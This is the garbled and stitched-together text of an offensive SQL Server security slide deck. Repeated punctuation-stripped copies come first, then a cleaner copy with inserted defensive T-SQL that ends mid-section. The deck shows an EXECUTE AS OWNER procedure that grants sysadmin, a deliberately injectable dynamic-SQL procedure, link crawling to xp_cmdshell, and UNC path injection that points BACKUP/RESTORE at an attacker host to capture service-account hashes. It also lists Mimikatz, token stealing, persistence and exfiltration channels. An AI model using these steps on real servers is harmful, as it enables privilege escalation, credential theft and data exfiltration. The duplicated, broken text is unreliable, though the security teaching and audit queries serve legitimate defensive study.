select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER
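A defender’s check for the condition the slide describes (a TRUSTWORTHY database owned by a sysadmin, plus the db_owner members who could create such a procedure), as an added T-SQL audit query that is not part of the deck or of PowerUpSQL; it assumes it is run as a sysadmin on the instance.

```sql
-- Added audit query, not from the original deck. Lists databases where the
-- EXECUTE AS OWNER path above is open (TRUSTWORTHY on, owner is a sysadmin),
-- then enumerates the db_owner members of each such database.
-- msdb is excluded because it is TRUSTWORTHY by design.

-- Part 1: TRUSTWORTHY databases whose owner is a sysadmin login
SELECT d.name  AS database_name,
       sp.name AS owner_login,
       d.is_trustworthy_on
FROM sys.databases d
JOIN sys.server_principals sp ON sp.sid = d.owner_sid
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND d.name <> N'msdb';

-- Part 2: db_owner members of those databases. One SELECT per database is
-- built with QUOTENAME so a hostile database name cannot break the statement.
DECLARE @sql nvarchar(max) = N'';
SELECT @sql = @sql
    + N' UNION ALL SELECT ' + QUOTENAME(d.name, '''') + N' AS database_name, m.name AS db_owner_member, m.type_desc'
    + N' FROM ' + QUOTENAME(d.name) + N'.sys.database_role_members rm'
    + N' JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals r ON r.principal_id = rm.role_principal_id'
    + N' JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals m ON m.principal_id = rm.member_principal_id'
    + N' WHERE r.name = N''db_owner'''
FROM sys.databases d
JOIN sys.server_principals sp ON sp.sid = d.owner_sid
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND d.name <> N'msdb'
  AND d.state_desc = N'ONLINE';

IF @sql <> N''
BEGIN
    SET @sql = STUFF(@sql, 1, 11, N'');   -- drop the leading ' UNION ALL ' (11 characters)
    EXEC sys.sp_executesql @sql;
END

-- Remediation for a finding (uncomment and substitute the database name):
-- ALTER DATABASE [MyAppDb] SET TRUSTWORTHY OFF;
-- ALTER AUTHORIZATION ON DATABASE::[MyAppDb] TO [low_privilege_login];
```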
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certificate
o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
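The seven signed-procedure steps above carried through for one procedure, as an added T-SQL example that is not part of the deck or of PowerUpSQL. MyAppDb and MyAppUser are the deck’s names (MyAppUser is assumed to be a login with a mapped user in MyAppDb); the procedure, certificate and login names are hypothetical, and the public-key copy into master uses CERTENCODED, which needs SQL Server 2012 or later.

```sql
USE MyAppDb;
GO
-- Added example, not from the original deck. MyAppDb and MyAppUser come from
-- the deck; the procedure, certificate and login names are hypothetical.

-- Step 1: the procedure that needs a server-level right. Listing sessions
-- requires VIEW SERVER STATE, which the caller itself is never granted.
CREATE PROCEDURE dbo.usp_ListActiveSessions
AS
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
GO

-- Step 2: a database master key protects the certificate's private key
-- (skip if MyAppDb already has one)
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Placeholder-DMK-Pa55word!';
GO

-- Step 3: a certificate that exists only to sign this procedure
CREATE CERTIFICATE SessionsSigningCert
    WITH SUBJECT = 'Signs dbo.usp_ListActiveSessions';
GO

-- Step 4: logins live in master, so copy the certificate's PUBLIC key there
-- (CERTENCODED, SQL Server 2012+) and create the login from it. The private
-- key never leaves MyAppDb; master only needs to verify signatures.
DECLARE @ddl nvarchar(max) =
      N'CREATE CERTIFICATE SessionsSigningCert FROM BINARY = '
    + CONVERT(nvarchar(max), CERTENCODED(CERT_ID('SessionsSigningCert')), 1) + N';';
EXEC master.sys.sp_executesql @ddl;
GO
USE master;
GO
CREATE LOGIN SessionsSigningLogin FROM CERTIFICATE SessionsSigningCert;

-- Step 5: grant that login exactly the permission the procedure needs
GRANT VIEW SERVER STATE TO SessionsSigningLogin;
GO

-- Step 6: sign the procedure. While this exact body runs, the caller's token
-- also carries SessionsSigningLogin's permissions; ALTERing the procedure
-- drops the signature, so a tampered body loses the right.
USE MyAppDb;
GO
ADD SIGNATURE TO dbo.usp_ListActiveSessions BY CERTIFICATE SessionsSigningCert;
GO

-- Step 7: let the application login run it. No IMPERSONATE grant, no
-- TRUSTWORTHY setting and no db_owner membership are involved.
GRANT EXECUTE ON dbo.usp_ListActiveSessions TO MyAppUser;
GO

-- Check as the low-privileged login (EXECUTE AS LOGIN rather than AS USER,
-- because a user-level impersonation is sandboxed to the database)
EXECUTE AS LOGIN = 'MyAppUser';
EXEC dbo.usp_ListActiveSessions;
REVERT;
```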
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
DECLARE @query AS varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
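The same procedure with the injection removed, as an added T-SQL example that is not from the deck: the preferred fix is to drop the dynamic SQL altogether; where dynamic SQL is unavoidable, bind values through sp_executesql parameters and resolve identifiers through the catalog and QUOTENAME. The procedure names are hypothetical.

```sql
-- Added example, not from the original deck: hardened rewrites of sp_sqli2.
-- Each treats the caller's argument as data, so a quote in it cannot close
-- the string literal and append statements the way it can when concatenated.

-- Fix 1 (preferred): there was never a need for dynamic SQL here
CREATE PROCEDURE dbo.sp_sqli2_static
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    -- @DbName is a value in an expression, never part of the statement text.
    -- (LIKE wildcards in it still act as wildcards; that is not injection.)
    SELECT name
    FROM master.sys.databases
    WHERE name LIKE N'%' + @DbName + N'%'
       OR name = N'tempdb';
END
GO

-- Fix 2: when the statement text really must be built at run time, keep the
-- user-supplied value out of the text and bind it as a parameter
CREATE PROCEDURE dbo.sp_sqli2_parameterized
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases '
      + N'WHERE name LIKE N''%'' + @pattern + N''%'' OR name = N''tempdb'';';
    -- the text above is a constant; @DbName arrives as the @pattern parameter
    EXEC sys.sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO

-- Identifiers cannot be parameterized. When one must be spliced into dynamic
-- SQL, resolve it through the catalog and QUOTENAME the resolved parts.
CREATE PROCEDURE dbo.usp_count_rows
    @TableName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @id int = OBJECT_ID(@TableName, N'U');
    IF @id IS NULL
    BEGIN
        RAISERROR(N'Unknown table', 16, 1);
        RETURN;
    END
    DECLARE @query nvarchar(max) = N'SELECT COUNT(*) AS row_count FROM '
        + QUOTENAME(OBJECT_SCHEMA_NAME(@id)) + N'.' + QUOTENAME(OBJECT_NAME(@id)) + N';';
    EXEC sys.sp_executesql @query;
END
GO

-- Awkward input is searched for, not executed, in both rewrites
EXEC dbo.sp_sqli2_static        @DbName = N'O''Brien';
EXEC dbo.sp_sqli2_parameterized @DbName = N'O''Brien';
```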
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Components: LRA, HVA, LVA, ADS, LVA. Port labels: 80 and 443; 1433 and 1434. Attack path built up across the slides, starting from the attacker “Captain Evil” (box labelled PURE EVIL): 1. SQL Injection; 2. Execute local command via xp_cmdshell; 3. Access to HVA with shared domain service account, executing commands and gathering data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links
What’s a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database links. Same zones and components as the previous diagram (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; ports 80 and 443, 1433 and 1434), plus a database server DB1 (LVA). Attack path built up across the slides: 1. SQL Injection by Captain Evil (PURE EVIL); database links labelled “DB Link with Least Privileges” and “DB Link with SA account”; 2. Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we’ve seen
• The max number of hops we’ve seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql
Escalating Privileges: Crawling Server Links
Function | Description
Get-SQLServerLink | Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl | Crawls linked servers and supports SQL query and OS command execution
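An audit query for the two link configurations in the diagrams (least-privilege mapping versus a fixed sa mapping), as an added T-SQL example that is not from the deck and not PowerUpSQL’s Get-SQLServerLink; it assumes it is run as sysadmin on each instance, and SQLSERVER2 and the login names in the remediation comment are placeholders.

```sql
-- Added audit query, not from the original deck: for each linked server, show
-- which local logins may use it and what identity they get on the far side.
-- local_principal_id = 0 is the catch-all mapping every login (so the public
-- role) can use; uses_self_credential = 0 with a remote_name is a fixed
-- credential, the "DB Link with SA account" case when that name is a sysadmin.
SELECT  s.name                                   AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled,      -- 1: EXEC ... AT remote works (remote stored procedures)
        s.is_data_access_enabled,  -- 1: OPENQUERY works
        CASE ll.local_principal_id
             WHEN 0 THEN N'<all local logins>'
             ELSE lp.name
        END                                      AS local_login,
        CASE WHEN ll.uses_self_credential = 1 THEN N'<caller''s own credentials>'
             WHEN ll.remote_name IS NULL       THEN N'<no login: connection refused>'
             ELSE ll.remote_name
        END                                      AS remote_login,
        CASE WHEN ll.uses_self_credential = 0
              AND ll.remote_name = N'sa'       -- extend with other known sysadmin names
             THEN N'HIGH: fixed sysadmin credential on the remote side'
             WHEN ll.local_principal_id = 0
              AND ll.uses_self_credential = 0
              AND ll.remote_name IS NOT NULL
             THEN N'MEDIUM: every local login, public included, gets a fixed remote identity'
             WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 1
             THEN N'LOW: pass-through; remote rights equal the caller''s own'
             ELSE N'review'
        END                                      AS finding
FROM sys.servers s
LEFT JOIN sys.linked_logins ll     ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation pattern for a HIGH/MEDIUM finding (placeholders, substitute real names):
-- remove the catch-all mapping, then map only the logins that need the link
-- to a least-privilege remote login.
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;
-- EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'SQLSERVER2', @useself = N'FALSE',
--      @locallogin = N'ReportingLogin', @rmtuser = N'link_reader', @rmtpassword = N'<password>';
```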
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
